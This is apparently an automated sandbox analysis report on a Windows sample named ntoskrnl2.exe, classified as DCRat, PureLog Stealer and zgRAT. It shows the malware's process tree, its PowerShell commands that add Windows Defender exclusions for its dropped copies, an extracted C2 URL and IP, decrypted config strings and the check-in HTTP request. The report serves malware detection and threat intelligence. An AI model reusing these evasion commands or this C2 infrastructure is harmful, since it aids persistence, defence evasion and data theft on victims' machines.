Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ntoskrnl2.exe

Overview

General Information

Sample name:ntoskrnl2.exe
Analysis ID:1589204
MD5:c8848d70c25cf0a1e0a4122cab55e5f8
SHA1:20e0cffe94951e3201ca5aa3f5a2876b20408702
SHA256:6ebed9f6de82360a3724c5148eaaced3273ce3e48826492d87da9d7e978eb6fc
Tags:DCRatexeNyashTeamuser-MalHunter1
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ntoskrnl2.exe (PID: 360 cmdline: "C:\Users\user\Desktop\ntoskrnl2.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
    • powershell.exe (PID: 7088 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4508 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 432 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1868 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5764 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7500 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7580 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • GFIYCbjKVID.exe (PID: 8040 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • GFIYCbjKVID.exe (PID: 7420 cmdline: C:\Windows\Containers\GFIYCbjKVID.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • GFIYCbjKVID.exe (PID: 7436 cmdline: C:\Windows\Containers\GFIYCbjKVID.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • ntoskrnl2.exe (PID: 7516 cmdline: C:\Users\user\Desktop\ntoskrnl2.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • ntoskrnl2.exe (PID: 7532 cmdline: C:\Users\user\Desktop\ntoskrnl2.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: ntoskrnl2.exe PID: 360JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.ntoskrnl2.exe.1b140000.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.ntoskrnl2.exe.1b140000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.ntoskrnl2.exe.1b140000.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.2.ntoskrnl2.exe.1b140000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ntoskrnl2.exe", ParentImage: C:\Users\user\Desktop\ntoskrnl2.exe, ParentProcessId: 360, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', ProcessId: 7088, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ntoskrnl2.exe", ParentImage: C:\Users\user\Desktop\ntoskrnl2.exe, ParentProcessId: 360, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', ProcessId: 7088, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ntoskrnl2.exe", ParentImage: C:\Users\user\Desktop\ntoskrnl2.exe, ParentProcessId: 360, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe', ProcessId: 7088, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T16:33:10.673093+010020480951A Network Trojan was detected192.168.2.54970437.44.238.25080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: ntoskrnl2.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Local\Temp\09VUCC0aBk.batAvira: detection malicious, Label: BAT/Delbat.C
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\fscFeKAz.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\olnMZMXE.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Found malware configuration
                    Source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeReversingLabs: Detection: 76%
                    Source: C:\Recovery\GFIYCbjKVID.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\NewzHbtF.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\clfwIsGE.logReversingLabs: Detection: 25%
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeReversingLabs: Detection: 76%
                    Source: C:\Windows\Migration\WTR\GFIYCbjKVID.exeReversingLabs: Detection: 76%
                    Source: C:\Windows\PLA\Templates\GFIYCbjKVID.exeReversingLabs: Detection: 76%
                    Multi AV Scanner detection for submitted file
                    Source: ntoskrnl2.exeVirustotal: Detection: 76%Perma Link
                    Source: ntoskrnl2.exeReversingLabs: Detection: 76%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\Desktop\NgAzKpfk.logJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\fscFeKAz.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\dxIWpAcW.logJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\olnMZMXE.logJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: ntoskrnl2.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"}}
                    Source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DkfDkSKDFkSDFKFDSgdfgk","0","KeyauthProtected","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                    Source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://128538cm.n9shteam3.top/","VmPipepacketupdateflowerAsyncDatalifeTempuploads"]]
                    Source: ntoskrnl2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\d899e5aa4a0be6Jump to behavior
                    Source: ntoskrnl2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49704 -> 37.44.238.250:80
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: 128538cm.n9shteam3.top
                    Source: unknownHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:33:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: ntoskrnl2.exe, 00000025.00000002.2162764443.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128538cm.n9shteam3.top
                    Source: ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128538cm.n9shteam3.top/
                    Source: ntoskrnl2.exe, 00000025.00000002.2170774082.000000001B2C0000.00000004.00000020.00020000.00000000.sdmp, ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php
                    Source: powershell.exe, 00000014.00000002.3375326418.0000026B639A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000019.00000002.3437459667.000001DF682F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micRjj
                    Source: powershell.exe, 00000014.00000002.3375326418.0000026B639A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 00000014.00000002.3078545341.0000026B5B732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2959531615.0000020890072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3132420898.000001DF5FF12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3139105801.000001CF5B0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000015.00000002.3307110004.00000208E84A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micrwD
                    Source: powershell.exe, 00000014.00000002.2188394270.0000026B4B8E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14797000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF500C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: ntoskrnl2.exe, 00000000.00000002.2059905488.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2188394270.0000026B4B6C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF4FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8AB1000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000014.00000002.2188394270.0000026B4B8E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14797000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF500C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000019.00000002.3437459667.000001DF682F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: powershell.exe, 00000014.00000002.2188394270.0000026B4B6C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF4FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000015.00000002.3307110004.00000208E84A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5w
                    Source: powershell.exe, 00000014.00000002.3078545341.0000026B5B732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2959531615.0000020890072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3132420898.000001DF5FF12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3139105801.000001CF5B0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Containers\GFIYCbjKVID.exeJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Containers\GFIYCbjKVID.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Containers\d899e5aa4a0be6Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Migration\WTR\GFIYCbjKVID.exeJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Migration\WTR\GFIYCbjKVID.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\Migration\WTR\d899e5aa4a0be6Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\PLA\Templates\GFIYCbjKVID.exeJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\PLA\Templates\GFIYCbjKVID.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Windows\PLA\Templates\d899e5aa4a0be6Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF849319DDD0_2_00007FF849319DDD
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF849317B630_2_00007FF849317B63
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF848F2245D20_2_00007FF848F2245D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848F1245D21_2_00007FF848F1245D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848FD2E1123_2_00007FF848FD2E11
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848FE30E925_2_00007FF848FE30E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FF848FE32C027_2_00007FF848FE32C0
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492FAF7037_2_00007FF8492FAF70
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492F7B6337_2_00007FF8492F7B63
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeCode function: 42_2_00007FF848F30BAC42_2_00007FF848F30BAC
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeCode function: 42_2_00007FF848F30D8F42_2_00007FF848F30D8F
